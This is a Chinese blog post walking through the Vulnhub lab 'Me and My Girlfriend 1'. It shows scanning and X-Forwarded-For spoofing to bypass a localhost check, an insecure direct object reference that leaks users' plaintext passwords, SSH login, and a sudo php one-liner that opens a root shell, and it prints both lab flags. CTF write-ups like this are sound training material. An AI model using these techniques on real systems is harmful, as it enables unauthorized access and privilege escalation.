<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>Vulnhub靶机——Me and My Girlfirend1 | 土豆子</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><meta name="generator" content="Hexo 4.2.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Vulnhub靶机——Me and My Girlfirend1</h1><a id="logo" href="/.">土豆子</a><p class="description">Try Harder</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/tags/"><i class="fa fa-tag"> 标签</i></a><a href="/toolbox/"><i class="fa fa-wrench"> Tools</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">Vulnhub靶机——Me and My Girlfirend1</h1><div class="post-meta">Mar 3, 2020<span> | </span><span class="category"><a href="/categories/vulnhub/">vulnhub</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#提权"><span class="toc-number">2.</span> <span class="toc-text">提权</span></a></li></ol></div></div><div class="post-content"><blockquote>
<p>2020-02-10-22</p>
</blockquote>
<br>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, &quot;Ceban Corp&quot;, something has changed from Alice&#39;s attitude towards Bob like something is &quot;hidden&quot;, And Bob asks for your help to get what Alice is hiding and get full access to the company!</span><br><span class="line"></span><br><span class="line">Difficulty Level: Beginner</span><br><span class="line"></span><br><span class="line">Notes: there are 2 flag files</span><br><span class="line"></span><br><span class="line">Learning: Web Application | Simple Privilege Escalation</span><br><span class="line"></span><br><span class="line">From : https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;me-and-my-girlfriend-1,409&#x2F;</span><br></pre></td></tr></table></figure>

<br>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Kali：192.168.56.109</span><br><span class="line"></span><br><span class="line">目标网段：192.168.56.1&#x2F;24</span><br></pre></td></tr></table></figure>

<br>

<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><br>

<p>显示主机存活扫描：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -n -sn -T5 -v 192.168.56.1/24 | grep -B 1 <span class="string">"Host is up"</span></span><br></pre></td></tr></table></figure>

<br>

<p><img src="image-20200210204802372.png" alt="image-20200210204802372"> </p>
<br>

<p>排除本机与网关后，找出目标机，扫服务/端口：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))</span><br></pre></td></tr></table></figure>

<br>

<p>访问 <code>80</code> 端口的 Web页面。显示只有 <code>local</code> 地址才能访问，看源代码，作者给出提示：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- Maybe you can search how to use x-forwarded-for --&gt;</span></span><br></pre></td></tr></table></figure>

<br>

<p><code>x-forwarded-for</code> ：用来识别通过 HTTP代理或负载均衡方式连接到 Web服务器的客户端<strong>最原始的IP地址</strong>的HTTP请求头字段（就是服务器用来识别客户端原始 IP 地址的）</p>
<br>

<p>改请求头，添加字段：<code>x-forwarded-for：localhost</code> ，返回页面信息（建议使用 Burp）</p>
<br>

<p><img src="2020-02-10-18-50-07%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="postman"> </p>
<p><img src="2020-02-10-20-58-57%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<br>

<hr>
<p><strong>NOTE</strong> ： 这里犯了一个错误，在查 <code>x-forwarded-for</code> 的时候，偶然看到了 <code>Postman</code> 也就是上图中的软件，下载、使用、测试浪费了许多时间，且最后越来越麻烦（提交表格、登录），最后便放弃了</p>
<br>

<p>不是说上图的软件不好用或难用，而是对其一点都不熟悉，不懂套路；<code>Burp</code> 使用不熟练 </p>
<p>在 Burp 上有更方便的操作方式，后来改之</p>
<br>

<hr>
<br>

<p>通过改 <code>x-forwarded-for</code> 值，达到了欺骗服务器并返回数据，页面源代码并无有价值信息</p>
<br>

<p>既然是 Web 那便开始扫目录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ dirsearch.py -u http://192.168.56.111 -e php --random-agents -t 32</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ dirb http://192.168.56.111</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nikto -h http://192.168.56.111</span><br></pre></td></tr></table></figure>

<br>

<p><img src="2020-02-10-18-46-41%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<p><img src="2020-02-10-18-48-04%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<br>


<p>得到地址：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.56.111/config/</span><br><span class="line">http://192.168.56.111/index.php/login/</span><br><span class="line">http://192.168.56.111/misc/</span><br><span class="line">http://192.168.56.111/robots.txt        <span class="comment">## /heyhoo.txt  </span></span><br><span class="line">http://192.168.56.111/server-status     <span class="comment">## 404</span></span><br><span class="line">http://192.168.56.111/heyhoo.txt        <span class="comment">### null</span></span><br></pre></td></tr></table></figure>

<p>经访问，下面两个地址返回 <code>200 OK</code> 但却空白，一般是后续填充内容使用：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.56.111/config/config.php   	<span class="comment"># 200 OK 返回空白</span></span><br><span class="line">http://192.168.56.111/misc/process.php      <span class="comment"># 200 OK 返回空白</span></span><br></pre></td></tr></table></figure>

<p><code>robot.txt</code> 只有一个限制地址，访问并无又有用价值</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/heyhoo.txt</span><br><span class="line"></span><br><span class="line">http://192.168.56.111/heyhoo.txt	<span class="comment"># 无有用信息</span></span><br></pre></td></tr></table></figure>

<br>

<p>最后的几个地址，需要通过修改 <code>x-forwarded-for</code> 值才能访问：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.56.111/index.php/login/?page=index	<span class="comment"># Index</span></span><br><span class="line"> </span><br><span class="line">?page=login     <span class="comment">### 登录页面</span></span><br><span class="line">?page=about     <span class="comment">#### 无有价值信息</span></span><br><span class="line">?page=register  <span class="comment">## 注册页面</span></span><br></pre></td></tr></table></figure>

<br>

<p><img src="2020-02-10-21-37-15%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<br>

<p>注册后跳转登录，有三个选项， <code>Dahboard</code> 与 <code>Logout</code> 无甚作用，<code>Profile</code> 会显示你的账号信息</p>
<p>看源代码，除密码为明文，无其他有价值信息。</p>
<br>

<p>其实，跳转到 <code>Profile</code> 页的时候，就已经注意到 URL 了：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.56.111/misc/process.php?page=profile&amp;user_id=14</span><br></pre></td></tr></table></figure>

<br>

<p><code>sqlmap</code> 并没有跑出什么，到时在改变数字的时候，底下会出现其他用户的信息</p>
<br>

<p>从一开始，挨个访问，到 <code>5</code> 的时候，出现了用户名为：<code>alice</code> 的用户，也就是 <code>GirlFriend</code> </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Name: Alice Geulis</span><br><span class="line">username: alice</span><br><span class="line">passwd: 4lic3</span><br></pre></td></tr></table></figure>

<br>
<br>


<p><img src="2020-02-10-21-43-00%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<p><img src="2020-02-10-19-33-32%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<p>登录 SSH 成功，访问目录得到隐藏文件和 FLAG1。然后就可以提权了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Flag 1 : gfriEND&#123;2f5f21b2af1b8c3e227bcf35544f8f09&#125;</span><br></pre></td></tr></table></figure>

<br>



<p><img src="2020-02-10-19-48-17%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<br>

<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><br>

<p>执行 <code>sudo -l</code> ，发现了可以使用 <code>php</code> ，执行以下命令，直接提权：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">CMD=<span class="string">"/bin/sh"</span></span><br><span class="line">sudo php -r <span class="string">"system('<span class="variable">$CMD</span>');"</span></span><br></pre></td></tr></table></figure>

<p>得到 FLAG2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Thanks! Flag 2: gfriEND&#123;56fbeef560930e77ff984b644fde66e7&#125;</span><br></pre></td></tr></table></figure>


<br>


<p><img src="2020-02-10-22-01-37%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<p><img src="2020-02-10-20-24-11%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
<p><img src="2020-02-10-20-23-55%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt=""> </p>
</div><div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Potatoz</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="/2020/03/03/Me-and-My-Girlfirend1/">https://mr-potatoz.github.io/2020/03/03/Me-and-My-Girlfirend1/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>欢迎转载、引用，但请标明作者和原文地址，谢谢。 :D</li></ul></div><br><div class="tags"><a href="/tags/vulnhub/">vulnhub</a><a href="/tags/OSCP/">OSCP</a></div><div class="post-nav"><a class="pre" href="/2020/03/10/hackNos-2/">hackNos-2</a><a class="next" href="/2020/03/03/JIS-CTF/">Vulnhub靶机——JIS-CTF</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/vulnhub/">vulnhub</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9A%8F%E7%AC%94/">随笔</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/Note/" style="font-size: 15px;">Note</a> <a href="/tags/vulnhub/" style="font-size: 25px;">vulnhub</a> <a href="/tags/OSCP/" style="font-size: 25px;">OSCP</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/DC-1/">DC-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/LiterallyVulnerable/">LiterallyVulnerable</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/Five86-2/">Five86-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/10/Five86-1/">Five86-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/10/hackNos-2/">hackNos-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/03/Me-and-My-Girlfirend1/">Vulnhub靶机——Me and My Girlfirend1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/03/JIS-CTF/">Vulnhub靶机——JIS-CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/29/Test/">Try Harder</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://github.com/Mr-Potatoz" title="Github" target="_blank">Github</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2020 <a href="/." rel="nofollow">土豆子.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/search.js?v=0.0.0"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
   search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>